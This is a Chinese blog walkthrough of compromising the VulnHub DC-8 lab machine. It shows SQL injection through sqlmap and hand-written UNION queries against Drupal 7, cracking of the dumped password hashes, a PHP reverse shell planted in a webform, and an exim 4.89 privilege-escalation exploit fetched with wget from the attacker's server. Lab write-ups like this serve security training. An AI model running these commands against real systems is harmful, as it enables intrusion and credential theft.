DC系列(8)DC-8靶机渗透

最新推荐文章于 2024-03-24 18:58:40 发布
最新推荐文章于 2024-03-24 18:58:40 发布
阅读量2.6k 收藏 6
点赞数 1
分类专栏: DC靶机 文章标签: 安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43577567/article/details/122461030
版权

DC-8

0x00 前期准备

DC-8官网:https://www.vulnhub.com/entry/dc-8,367/
DC-8官wp:https://blog.mzfr.me/vulnhub-writeups/2019-09-5-DC8

  1. 官网提示:双重身份验证绕过,ssh相关。
    在这里插入图片描述

  2. 开启成功。
    在这里插入图片描述

0x01 sqlmap爆破/手动注入sql漏洞

  1. 常规扫描:nmap 172.20.10.0/24,找到DC8的ip地址为172.20.10.7,开放22、80端口。
    在这里插入图片描述

  2. 访问网页,CMS是Drupal7。
    在这里插入图片描述

  3. 依次点击detail中的栏目,看到url随之规律变化:?nid=1~3。
    在这里插入图片描述

  4. 猜测是数字型,试着sql注入3-2=1验证。存在sql漏洞。
    在这里插入图片描述

  5. 此处可以使用sqlmap工具爆破:sqlmap -u 172.20.10.7/?nid=2 --dbs --batch --risk 3 --level 5,爆破出mysql数据库中的两个库:

    使用参考:https://www.freebuf.com/sectool/164608.html

    在这里插入图片描述

  6. 针对d7db爆破:sqlmap -u 172.20.10.7/?nid=2 -D d7db --tables --batch --risk 3 --level 5,爆出user表。
    在这里插入图片描述

  7. 针对user表爆破:sqlmap -u 172.20.10.7/?nid=2 -D d7db -T users --risk 3 --level 5 --dump,可以看到有name和pass字段。
    在这里插入图片描述

  8. 针对这两个字段爆破:sqlmap -u 172.20.10.7/?nid=2 -D d7db -T users -C name,pass --dump,得到admin、john用户和加密的密码。
    在这里插入图片描述

  9. 或者,直接手动注入。因为是数字型注入,且有报错回显,开始借助hackbar爆库:http://172.20.10.7/?nid=1' --+
    在这里插入图片描述

  10. 爆出当前使用数据库名:http://172.20.10.7/?nid=-1 union select database() --+
    在这里插入图片描述

  11. 爆出数据库表名:http://172.20.10.7/?nid=-1 union select group_concat(table_name) from information_schema.tables where table_schema=database() --+,找到user表。
    在这里插入图片描述

  12. 爆列名:http://172.20.10.7/?nid=-1 union select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users' --+,找到pass和name列名。
    在这里插入图片描述

  13. 爆出这两列的内容,使用"-"连接:http://172.20.10.7/?nid=-1 union select group_concat(name,'-',pass) from users --+,得到同样的内容。
    在这里插入图片描述

0x02 John爆破登陆&login页面寻找

  1. 把用户名和密文写入dc8hash.txt。
    在这里插入图片描述

  2. 使用John破解:john dc8hash.txt,默认使用John自带词典。只爆破出了John的密码turtle。
    在这里插入图片描述

  3. 回到网页,表面没找到登陆界面,回到终端用dirb扫描网页目录(速度很慢),尝试直接访问http://172.20.10.7/robots.txt,找到了登陆界面/user/login。
    在这里插入图片描述

  4. 进入该网页路径,使用john-turtle登陆,成功。
    在这里插入图片描述

0x03 反弹shell

  1. 依次点击contact us→webform→form setting,在页面中切换Text format为php code。显然,这里可以写入php反弹shell代码(依然使用DC3中0x02提到的脚本)最上面写一段test语句,开放端口7788。
    在这里插入图片描述

  2. 拖到最下,保存contact us的配置,kali开启7788端口监听:nc -lvvp 7788,回到contact随意填写表单,其中邮件地址需要加@,否则提示地址错误无法提交。
    在这里插入图片描述

  3. 点击submit提交,kali中出现回显,反弹shell成功,进入交互式界面:python -c 'import pty;pty.spawn("/bin/bash")'
    在这里插入图片描述

0x04 exim提权

  1. 使用find命令查找具有suid权限的命令:find / -perm -u=s -type f 2>/dev/null。找到/usr/sbin/exim4,/sbin存放系统管理员以及其他需要root权限来运行的工具。

    sbin参考:https://cloud.tencent.com/developer/article/1009024
    在这里插入图片描述

  2. 查询exim版本号:exim4 –version,得到版本为4.89。
    在这里插入图片描述

  3. 在kali查询漏洞:searchsploit exim 4 -w
    在这里插入图片描述

  4. 访问,将网页内的bash脚本复制并写入本地46996.sh。在kali开启http服务:python2 -m SimpleHTTPServer 5566
    在这里插入图片描述

  5. 在dc8靶机下载文件:wget http://172.20.10.3:5566/46996.sh,注意此处一定要先切换到/tmp目录下,wget才拥有足够的权限写入文件。
    在这里插入图片描述

  6. 赋予脚本可执行权限:chmod +x 46996.sh。回顾46996.sh注释,提示在netcat模式下执行脚本如下:./46996.sh -m netcat
    在这里插入图片描述

  7. 按上一步执行脚本,提权成功。
    在这里插入图片描述

  8. 进入root目录,找到flag.txt,渗透结束。
    在这里插入图片描述

Nikris
关注
  • 1
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DC-8靶机渗透
whylon的博客
07-26 430
DC-8靶机渗透 文章目录DC-8靶机渗透信息收集漏洞利用获得shell提权 请勿用文章中的手段进行违法攻击,做守法公民,利用文中手段造成不良行为后果本文作者概不负责 信息收集 首先发现存活主机 发现目标主机ip为192.168.11.132,我们的kali ip为192.168.11.129,现在我们探测敏感目录 使用dirsearch工具首先没安装的要安装 apt-get install dirsearch #安装dirsearch dirsearch -u "http://192.168.11.13
看完这篇 教你玩转渗透测试靶机vulnhub——DC8
Aluxian_的博客
04-07 2031
Vulnhub靶机DC8渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载:Vulnhub靶机安装:Vulnhub靶机漏洞详解:①:信息收集:②:暴力破解: Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 靶机DC8 还是老样子只有拿到root权限才可以发现最终的flag。 Vulnhub靶机下载: 官网地址:https://download.vulnhub.c
2021-08-22dc8靶机(sqlmapgetshell+john+dos改unix解释器用exp提权)
qq_45290991的博客
08-22 182
namp 80端口Drupal7 发现url可能存在注入 确认数字型注入存在 简单一点上sqlmap 找到users表 获得密码 将这两个hash在john爆破 试了之后是john的密码,admin的密码没有爆出来,登陆 contact页面可以编辑 注意红框部分,可以编辑php代码,试着反弹...
DC-8靶机渗透详细流程
braty_的博客
02-07 1031
DC-8靶机渗透详细流程
靶机DC-8(详细渗透,适合新手渗透
热门推荐
君莫hacker的博客
09-05 1万+
目录靶机DC-8 (详细渗透,适合新手渗透)0x01靶机描述0x02环境搭建1. 下载并导入靶机2. 查看网络适配器3. 启动靶机0x03靶机渗透一、 信息收集1. 主机发现2. 端口扫描3. 详细扫描4. 目录扫描5. gobuster目录扫描6. 网站指纹识别二、 漏洞挖掘手工sql注入1. 通过手工验证,此处url含有sql注入漏洞2. 判断字段数3. 判断显示位置4. 查看当前数据库5. 查找库d7db中所有的表6. 查找uesrs表中所有的列7. 查询表中的数据sqlmap自动化执行1. 查当前数
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
DC8靶机渗透测试(个人学习记录)
最新发布
m0_53806046的博客
03-24 1036
SUID位允许用户以文件所有者的身份执行文件,而不是以用户自己的权限执行。当一个文件设置了SUID位(4000)时,这意味着当用户执行该文件时,他们将以该文件的所有者身份执行,而不是以他们自己的用户身份执行。2>/dev/null:这部分是将标准错误(stderr)重定向到 /dev/null,这意味着任何错误消息(例如,无法访问的目录或文件)都会被忽略,不会显示在命令输出中。它是最常用的密码测试和破解程序之一,因为它将多个密码破解程序合并到一个软件包中,可以自动检测密码哈希类型,并包含可定制的破解器。
DC-8靶机渗透测试
来日可期的博客
08-13 1571
综上所述,该命令使用 msfvenom 工具生成一个 PHP Meterpreter 反向 TCP Shell 的 payload。该 payload 将在攻击者指定的 IP 地址和端口上监听,并允许攻击者对受感染的系统进行远程控制。这个命令是使用 Metasploit Framework 中的 msfvenom 工具生成一个 PHP Meterpreter 反向 TCP Shell 的 payload,并将生成的代码保存到。在搜索页面的时候发现,页面中有一个可以上传php代码的地方。
DC-8靶机教程
qq_40863723的博客
02-17 1650
多喝热水:http://hackergu.com/ 一、主机发现 ​ 使用netdiscover,发现主机IP为192.168.203.134。 二、端口扫描 root@kali:~# nmap -sV -A 192.168.203.134 --script=vuln Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-16 22:40 CST ...
dc-8 靶机渗透学习
..
03-24 4926
信息收集 扫描当前网段 nmap -sP 192.168.202.0/24 扫描开放端口 nmap -A -p- -v 192.168.202.147 访问靶机的80端口,用Wappalyzer识别框架 随便看看页面,简单对存在的参数进行sql测试,发现了一处疑似sql注入漏洞 漏洞利用 直接放到sqlmap跑吧,懒得手测了。 sqlmap -u http://192.168.202.147?nid=1 --dbs --batch --...
靶机渗透 -- DC-8
qq_42785117的博客
09-28 2156
dc-8靶机下载地址:点这里 环境: kali ip: 192.168.157.124 靶机ip:192.168.157.143 渗透阶段 首先寻找靶机IP,以及扫描靶机的端口信息 使用cmsmap扫描,确定CMS名称以及版本 浏览网站,发现疑似注入点 使用sqlmap爆库得到数据 在user表中查询到账户密码 使用john工具进行破解,得到登录密码(这里用户名叫做john也是一种提示...
Vulnhub靶机:DC-8渗透详细过程
IerkeU的博客
03-28 2972
DC-8 前情提要 靶场地址:https://www.vulnhub.com/entry/dc-8,367/ DC-8是一个中级的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具) 翻译一下官方给出的一些信息: 这个挑战试图证明在 Linux 上安装和配置的双重身份验证是否可以防止 Linux 服务器被攻击。这个挑战的最终目标是绕过双重身份验证,获取根并读取唯一标志。除非您尝试通过SSH登录,否则您可能甚至不知道安装和配置了双重身份验
渗透练习>DC-8靶机渗透实验
qq_43855980的博客
04-09 600
靶机DC-8 环境配置: 使用平台:VMware 网卡模式:NAT模式 所属网段:217 攻击机kali:192.168.217.131 靶机dc8:未知 一、信息获取 1.masscan -p22 192.168.217.0/24 --rate=2000 ---------扫描获取217网段下的linux系统的ip 获取到ip:192.168.217.148,目前只开启了kali和dc8,所以推测该ip为dc8的IP地址 2.nmap -sC -sV -p- -n 192.168.217.14
渗透DC-1靶机设计思路
05-24
1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值